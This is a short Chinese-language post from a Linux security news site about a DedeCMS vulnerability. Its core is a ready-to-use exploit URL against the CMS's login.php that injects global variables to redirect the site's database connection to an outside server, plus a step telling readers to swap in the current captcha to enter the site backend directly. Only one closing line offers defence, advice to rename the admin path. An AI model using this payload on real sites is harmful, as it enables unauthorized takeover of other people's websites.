Linux安全网 - Linux操作系统_Linux 命令_Linux教程_Linux黑客

会员投稿 投稿指南 本期推荐:
搜索:
您的位置: Linux安全网 > Linux安全 > » 正文

dedecms织梦暴最新严重0day漏洞

来源: 未知 分享至:

众所周知,因使用简单、客户群多,织梦CMS一直被爆出许多漏洞

今天小编在群里得到织梦官方bbs' target='_blank'>论坛某版主可靠消息:“DEDECMS爆严重安全漏洞,

近期官方会发布相关补丁,望大家及时关注补丁动态。”

入侵EXP如下:

http://www.tmdsb.com/dede/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

把上面黑底黄字上的字母改为当前的验证码,即可直接进入网站后台。

小编分析了一下,此漏洞的前提是必须得到后台路径才能实现,因此大家

一定要养成使用DEDECM建站时改后台名字的习惯。


Tags:
分享至:
最新图文资讯
1 2 3 4 5 6
验证码:点击我更换图片 理智评论文明上网,拒绝恶意谩骂 用户名:
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史